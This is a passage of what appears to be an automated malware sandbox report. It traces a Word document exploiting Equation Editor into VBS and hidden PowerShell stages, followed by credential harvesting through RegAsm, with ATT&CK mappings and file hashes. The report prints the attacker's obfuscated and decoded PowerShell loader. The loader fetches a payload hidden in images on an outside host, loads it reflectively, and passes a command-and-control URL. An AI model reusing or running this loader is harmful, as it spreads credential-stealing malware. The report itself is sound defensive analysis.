- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1948

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imaginepixelloverkissu.vbs"
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBJDgTreEwDgTreVQBKDgTreC8DgTreMDgTreDgTre1DgTreDkDgTreLwDgTre1DgTreC4DgTreNDgTreDgTreuDgTreDMDgTreNwDgTrexDgTreC4DgTreNwDgTrewDgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ILUJ/059/5.4.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2612

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2456

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\duhsrdwpseftekssqqbaeomk"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2080

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\fomdswhrgmxggrgeabobpbhtkup"
6⤵
PID:1156

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\pqrwtoskuuplrxcirmidsfuktbhplp"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kfnnpnmwhqtedyhokyo"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:956

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\uatgqgxxvyljfevsbbjpst"
6⤵
- Accesses Microsoft Outlook accounts
PID:2516

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xuyqryhrrhdwpsrwlmwrvguknz"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\SysWOW64\certutil.exe
"C:\Windows\System32\certutil.exe" -decode "" "C:\Users\Admin\AppData\Local\DesktopPic\WallP.exe"
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\Admin\AppData\Local\DesktopPic\PicList.txt"
3⤵
PID:452

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
8a19e2f05bb9c727f7fb24ef7e6541e7

SHA1
fc4e212ec0c090fffc2c1b9c70fe5cb6c77592db

SHA256
7eb17f03f49ad906d62f715fe4e81e9341f8e7e900e429bc83d0787340dfa42f

SHA512
82b40631302b2338d74c48aaf0b848435020936eb99a1945a6a5397e123a6107eb5681d458595af641d4078383de41370afc882d94aec89e4c65f51e86c4c0d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
7c90ea0df99c897f5d6664904236b0b2

SHA1
bdac03a27d383923710a1afa1718af19079f90a6

SHA256
bbd9d6ce1af437914c3f7acd29e84a43f6eb88b647dd3137686ef79c6c79c6ea

SHA512
42e7ebe04c3dd1d1861fe1f720d3a3747b6de3aac2078df2881ba039a558f77fde24e6cde0678ba8909561303691dcd7f6b65a7acea1702b77bd4459f8b5a28b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
f9156f7072197144d4eb3517d0e301cd

SHA1
101faf9dec6ea8422458a191fc91a92fbbe4f0bb

SHA256
ace61b45ad2d5a89038068b3d1d5881193f990c65e56a23c3d2314de8e376c56

SHA512
4677ee4f1d6d0fac33caaeaa155722364659501e6caaa43ecfc73e6b14c91fd38a0765640594442d721b0a68db5da8ba43469e98797b5dd7c8354d8006a6a382

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
df65504f64be0024c34f20f33b8870cd

SHA1
e308e55a6a09457c6cc88b6da1f7d10eb5e1d4f6

SHA256
c718f169d955517069d652fcf5e41f9d01878d36f59e126ccdceef9619c5061f

SHA512
aa0f21ba4cc6884ea9e0a884c28d31c66c02c96059af3c4623f35c8420678131dda1f5e43bddf2477c271d35774576f0a3475b245caeae88f7bbf61c933b0479

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
8cb32548caa380d4c4e09f82d9ef7b2d

SHA1
fd145eea2d7b08ce1f325666d3a5f97701ad6f9c

SHA256
8438981513230e8ef26d920a13ff36a6c09723e4072fe4b09b9a37ffd63235a1

SHA512
12b042c2fcea4999a46eb0690ec2b10677f794e1cb7c9e985b75c5743efa31626a81901b1a6df5689a3eeb5e0054c8d579a89e3d7befd1049bb87aa03144d4f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
3cd43872a6c818441ac2caaae9681e9f

SHA1
1c1852d82dd0569496bff7a9908be8f4905f55e2

SHA256
327bf0e5dd77a6a8084c0961fae510c87072d3670f7d6a0e731d67fbca26459e

SHA512
d408c169cbaf3983f5d979b53abc35b352d83000a03c64f0899f9303371ceb5ada6ec06c80bae9299a28d029d8fe79b45a381b898bbd770b64c275306ca958f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\wegendideaofloverstogetbackinthelinetounderstandhowmuchilikeyoumorethanallseeher____youmygirlialwayslove[1].doc
Filesize
70KB

MD5
002863a1610420fbdd33527b235ae720

SHA1
0e954b555b08faf3dae04019947ab06f751dddb0

SHA256
92a8482b9e7ca1ad4d86c76cab2ed363fa995cdfa50c919a3714c28c7016020c

SHA512
ea957090b43430f044006f08616a3a4b4fb71817c7abc03b8a0b702a1ffca37e0e62877e46bd6197b82b1460b36691365f49d9f001506b3bb610aa93853e514e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab42EB.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4A1B.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar58C3.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\duhsrdwpseftekssqqbaeomk
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{041358E2-3A1D-42D9-9E6B-45A5ED77CD16}
Filesize
128KB

MD5
96b81ec25e9a87b8e76c09c178348685

SHA1
1dd352629106753be28a3c4c09f2f135444e13fa

SHA256
1e97ba6341121b4e671e8b831fd3c2caa8f2e99bfbbd24e8f4f25bce51aed840

SHA512
a11e4e200e675d2ee60a4aa8e427bd945c6501d6a6c16b482bdd06b944f53dc3ca1f9a4ae6641ab21f27b9d033a7bf1dc3174906b40bf35577de06b07aeefa7c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\EMZF5Q1F.txt
Filesize
829B

MD5
a526182e49038414e6f5c41d3e94b57c

SHA1
7bfb31cd250adce79d277c7fcfd328e6b750d860

SHA256
895953636f821e862d4f4400a37386469ddfd145b139634698b427f87ffa16db

SHA512
33c50ecf93c83e079d10e7fc30efc1c73dc63eee7e32b9312dbbb51ca04ce3becd81afef9fb8eb3309e1879ff5fd19ee030f77bd9d4a6cdadf1d4a6fc3fe6ff5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OBBVSOFV4KHNWIWMOASD.temp
Filesize
7KB

MD5
03b12f560ca1d4e39e7801fc99d7e06b

SHA1
1bdccbf212285522be8e20c937d903f0cfd9be2a

SHA256
0ad92051edf1cc9141049a71ce2bacff0df4d8ab251651a132f8814bbd30ac7b

SHA512
5a214a5edd2a22860b847feacdd187e1e2851118d087d49d3b4b4236e3bc05661fa28cff286c94e016d706b7398a40ab78e6040f0708487298af58db9d53a594

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
45f3b46ca83568df457f4ea9a6447e7b

SHA1
cd928e5f03b2753708e78d6161016454ff08f47c

SHA256
913d013ad28a81dcc41caa6d7b81f369c76ff2e6199c764287bdf482271607f0

SHA512
d69a60be30657eb6ed9d243d755af9579811ba330ed8429c9d4a8cd068b24cf78a1a66e97113f67b160e23ac00f34f4d71014ee2652e088887563bed272e0858

Download Submit
C:\Users\Admin\AppData\Roaming\imaginepixelloverkissu.vbs
Filesize
107KB

MD5
